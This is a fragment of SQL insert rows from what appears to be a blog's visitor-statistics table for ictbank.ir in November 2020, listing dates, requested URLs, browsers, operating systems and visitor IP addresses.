(6262,'2020-11-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','165.22.118.246','000',0,2,0),
(6263,'2020-11-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.92.47','000',0,1,0),
(6264,'2020-11-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','122.51.243.251','000',0,2,0),
(6265,'2020-11-03','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','13.59.115.201','000',0,1,0),
(6266,'2020-11-03','http://ictbank.ir/blog','Chrome','Android','8.0.0',NULL,NULL,'','85.17.164.43','000',0,1,0),
(6267,'2020-11-03','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.187.157','000',0,1,0),
(6268,'2020-11-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(6269,'2020-11-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6270,'2020-11-03','http://ictbank.ir/blog/','Opera','Windows','10.0',NULL,NULL,'','45.66.10.152','000',0,5,0),
(6271,'2020-11-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(6272,'2020-11-03','https://www.google.com/','Firefox','Linux','Unknown',NULL,NULL,'','181.56.74.230','000',0,1,0),
(6273,'2020-11-04','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,4,0),
(6274,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.34.172','000',0,1,0),
(6275,'2020-11-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(6276,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.121.29.48','000',0,1,0),
(6277,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.16','000',0,1,0),
(6278,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.125.82','000',0,1,0),
(6279,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.154','000',0,1,0),
(6280,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.143','000',0,1,0),
(6281,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.23.219.141','000',0,1,0),
(6282,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','74.142.232.241','000',0,1,0),
(6283,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.11','000',0,1,0),
(6284,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.120.3','000',0,1,0),
(6285,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.110','000',0,1,0),
(6286,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.165.222.148','000',0,1,0),
(6287,'2020-11-04','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6288,'2020-11-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.115','000',0,1,0),
(6289,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.160.101.207','000',0,1,0),
(6290,'2020-11-04','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','136.0.16.235','000',0,2,0),
(6291,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.38.244','000',0,1,0),
(6292,'2020-11-04','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.236.211.207','000',0,1,0),
(6293,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.34.198','000',0,1,0),
(6294,'2020-11-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(6295,'2020-11-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6296,'2020-11-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(6297,'2020-11-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(6298,'2020-11-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.145.12.230','000',0,1,0),
(6299,'2020-11-04','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','159.65.24.22','000',0,1,0),
(6300,'2020-11-04','http://ictbank.ir/blog','Chrome','OS X','10.15.6',NULL,NULL,'','54.194.184.42','000',0,1,0),
(6301,'2020-11-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(6302,'2020-11-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','194.36.87.13','000',0,3,0),
(6303,'2020-11-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.190.42','000',0,1,0),
(6304,'2020-11-05','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.77.142.166','000',0,6,0),
(6305,'2020-11-05','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.226','000',0,1,0),
(6306,'2020-11-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(6307,'2020-11-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.212.124','000',0,1,0),
(6308,'2020-11-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.138','000',0,1,0),
(6309,'2020-11-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.29.33.229','000',0,1,0),
(6310,'2020-11-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','178.137.130.25','000',0,7,0),
(6311,'2020-11-05','http://www.mapolas.com/?key=02a5e21f-f20d-4409-81be-16f23450ab86','Opera','Windows','10.0',NULL,NULL,'','130.204.86.54','000',0,1,0),
(6312,'2020-11-05','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.235.151.3','000',0,2,0),
(6313,'2020-11-05','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.220.139.103','000',0,1,0),
(6314,'2020-11-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.167.103.32','000',0,1,0),
(6315,'2020-11-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,2,0),
(6316,'2020-11-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(6317,'2020-11-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(6318,'2020-11-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.236.119','000',0,1,0),
(6319,'2020-11-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(6320,'2020-11-06','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(6321,'2020-11-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.34','000',0,1,0),
(6322,'2020-11-06','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','91.134.112.254','000',0,1,0),
(6323,'2020-11-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(6324,'2020-11-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','178.137.130.25','000',0,2,0),
(6325,'2020-11-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(6326,'2020-11-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.114.61','000',0,1,0),
(6327,'2020-11-06','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','34.210.230.84','000',0,1,0),
(6328,'2020-11-06','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.92.42.233','000',0,1,0),
(6329,'2020-11-06','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','95.54.248.59','000',0,1,0),
(6330,'2020-11-06','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','178.33.34.7','000',0,1,0),
(6331,'2020-11-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.179.211','000',0,1,0),
(6332,'2020-11-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6333,'2020-11-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','194.36.87.13','000',0,1,0),
(6334,'2020-11-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.129.238','000',0,1,0),
(6335,'2020-11-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.23.210','000',0,1,0),
(6336,'2020-11-06','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.236.148.17','000',0,1,0),
(6337,'2020-11-06','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6338,'2020-11-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(6339,'2020-11-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(6340,'2020-11-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(6341,'2020-11-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','208.91.111.138','000',0,1,0),
(6342,'2020-11-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6343,'2020-11-07','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.77.142.166','000',0,2,0),
(6344,'2020-11-07','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.79.143.252','000',0,1,0),
(6345,'2020-11-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.216.62','000',0,1,0),
(6346,'2020-11-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(6347,'2020-11-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6348,'2020-11-07','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','167.114.175.39','000',0,5,0),
(6349,'2020-11-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.153.11','000',0,1,0),
(6350,'2020-11-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.159.19.22','000',0,1,0),
(6351,'2020-11-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,3,0),
(6352,'2020-11-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(6353,'2020-11-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.161.96.119','000',0,1,0),
(6354,'2020-11-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(6355,'2020-11-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(6356,'2020-11-07','http://ictbank.ir/blog/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','Chrome','Windows','6.3',NULL,NULL,'','77.247.181.165','000',0,1,0),
(6357,'2020-11-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(6358,'2020-11-08','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','52.51.165.134','000',0,1,0),
(6359,'2020-11-08','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','183.60.141.171','000',0,1,0),
(6360,'2020-11-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,3,0),
(6361,'2020-11-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6362,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.58.105.6','000',0,1,0),
(6363,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.140.0.108','000',0,1,0),
(6364,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.59','000',0,1,0),
(6365,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.27.65','000',0,1,0),
(6366,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.68.105.248','000',0,1,0),
(6367,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.38.227.167','000',0,1,0),
(6368,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.32','000',0,1,0),
(6369,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.161','000',0,1,0),
(6370,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.89.22.44','000',0,1,0),
(6371,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','123.30.238.187','000',0,1,0),
(6372,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.84','000',0,1,0),
(6373,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.2','000',0,1,0),
(6374,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.31','000',0,1,0),
(6375,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.143','000',0,1,0),
(6376,'2020-11-08','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','3.131.98.138','000',0,1,0),
(6377,'2020-11-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(6378,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(6379,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.137.6','000',0,1,0),
(6380,'2020-11-08','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.139.74.45','000',0,1,0),
(6381,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.126.55.26','000',0,1,0),
(6382,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.213.214','000',0,1,0),
(6383,'2020-11-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6384,'2020-11-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(6385,'2020-11-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(6386,'2020-11-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.17.3.88','000',0,1,0),
(6387,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','18.234.67.136','000',0,1,0),
(6388,'2020-11-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.198.14.9','000',0,1,0),
(6389,'2020-11-08','http://ictbank.ir/blog/','Chrome','Windows','6.2',NULL,NULL,'','188.187.144.193','000',0,3,0),
(6390,'2020-11-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6391,'2020-11-09','http://ictbank.ir/blog','Chrome','OS X','10.15.6',NULL,NULL,'','34.251.9.77','000',0,1,0),
(6392,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.97.58','000',0,1,0),
(6393,'2020-11-09','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','158.222.11.26','000',0,58,0),
(6394,'2020-11-09','http://ictbank.ir/','Chrome','Windows','6.2',NULL,NULL,'','113.83.113.235','000',0,1,0),
(6395,'2020-11-09','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','152.136.222.124','000',0,2,0),
(6396,'2020-11-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6397,'2020-11-09','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6398,'2020-11-09','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','23.104.161.187','000',0,8,0),
(6399,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.111.44','000',0,1,0),
(6400,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.158.154.101','000',0,1,0),
(6401,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.193.122.47','000',0,1,0),
(6402,'2020-11-09','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.237.47.255','000',0,1,0),
(6403,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.129.211.11','000',0,1,0),
(6404,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','158.69.118.55','000',0,1,0),
(6405,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.244.52.99','000',0,1,0),
(6406,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.6','000',0,1,0),
(6407,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.195','000',0,1,0),
(6408,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.33','000',0,1,0),
(6409,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.47.193','000',0,1,0),
(6410,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.187','000',0,1,0),
(6411,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.105.69','000',0,1,0),
(6412,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.155','000',0,1,0),
(6413,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.157','000',0,1,0),
(6414,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.60','000',0,1,0),
(6415,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.153','000',0,1,0),
(6416,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.70.43.234','000',0,1,0),
(6417,'2020-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','158.69.226.152','000',0,1,0),
(6418,'2020-11-09','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','99.79.59.220','000',0,2,0),
(6419,'2020-11-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(6420,'2020-11-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(6421,'2020-11-09','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','95.174.110.235','000',0,1,0),
(6422,'2020-11-09','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','36.39.130.254','000',0,1,0),
(6423,'2020-11-10','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','36.39.130.254','000',0,1,0),
(6424,'2020-11-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','151.80.44.34','000',0,2,0),
(6425,'2020-11-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.150.28','000',0,1,0),
(6426,'2020-11-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.4','000',0,2,0),
(6427,'2020-11-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','54.185.113.122','000',0,2,0),
(6428,'2020-11-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','34.213.174.188','000',0,1,0),
(6429,'2020-11-10','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','181.214.101.228','000',0,1,0),
(6430,'2020-11-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.243.226','000',0,1,0),
(6431,'2020-11-10','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','38.145.84.176','000',0,1,0),
(6432,'2020-11-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(6433,'2020-11-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.124.255','000',0,1,0),
(6434,'2020-11-10','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','34.236.191.197','000',0,1,0),
(6435,'2020-11-10','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','191.101.110.211','000',0,26,0),
(6436,'2020-11-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.148.127','000',0,1,0),
(6437,'2020-11-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.100.87.249','000',0,1,0),
(6438,'2020-11-10','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.52.163.30','000',0,2,0),
(6439,'2020-11-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(6440,'2020-11-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(6441,'2020-11-10','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','79.7.95.252','000',0,1,0),
(6442,'2020-11-10','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.25.122.245','000',0,3,0),
(6443,'2020-11-10','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','3.249.23.222','000',0,1,0),
(6444,'2020-11-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(6445,'2020-11-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6446,'2020-11-11','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','217.160.3.103','000',0,5,0),
(6447,'2020-11-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.193.91','000',0,1,0),
(6448,'2020-11-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(6449,'2020-11-11','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','121.196.184.147','000',0,1,0),
(6450,'2020-11-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.227.28.198','000',0,2,0),
(6451,'2020-11-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(6452,'2020-11-11','http://ictbank.ir/','Chrome','OS X','10.11.6',NULL,NULL,'','193.187.91.18','000',0,1,0),
(6453,'2020-11-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.160.96.226','000',0,1,0),
(6454,'2020-11-11','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','165.225.39.65','000',0,1,0),
(6455,'2020-11-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.42.55','000',0,1,0),
(6456,'2020-11-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.99.141','000',0,1,0),
(6457,'2020-11-11','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.139.89.8','000',0,1,0),
(6458,'2020-11-11','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','216.245.198.62','000',0,1,0),
(6459,'2020-11-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6460,'2020-11-11','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6461,'2020-11-11','http://82.102.9.14/blog','Firefox','Windows','6.1',NULL,NULL,'','34.221.112.227','000',0,1,0),
(6462,'2020-11-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','91.144.130.24','000',0,2,0),
(6463,'2020-11-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.75.144.43','000',0,1,0),
(6464,'2020-11-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(6465,'2020-11-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6466,'2020-11-11','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','89.248.172.208','000',0,1,0),
(6467,'2020-11-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(6468,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.13.119','000',0,1,0),
(6469,'2020-11-12','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','15.164.88.239','000',0,2,0),
(6470,'2020-11-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(6471,'2020-11-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(6472,'2020-11-12','http://www.ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.89.228.207','000',0,2,0),
(6473,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.237.144.72','000',0,2,0),
(6474,'2020-11-12','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.45','000',0,1,0),
(6475,'2020-11-12','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','185.21.103.76','000',0,1,0),
(6476,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.34.237.111','000',0,1,0),
(6477,'2020-11-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(6478,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,1,0),
(6479,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.92.57','000',0,1,0),
(6480,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.188','000',0,2,0),
(6481,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','207.246.240.117','000',0,1,0),
(6482,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','208.113.181.151','000',0,1,0),
(6483,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.208.52','000',0,1,0),
(6484,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.170','000',0,1,0),
(6485,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.115','000',0,1,0),
(6486,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.44.4.203','000',0,1,0),
(6487,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','154.0.164.211','000',0,1,0),
(6488,'2020-11-12','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.137.145.190','000',0,1,0),
(6489,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.214.214.112','000',0,1,0),
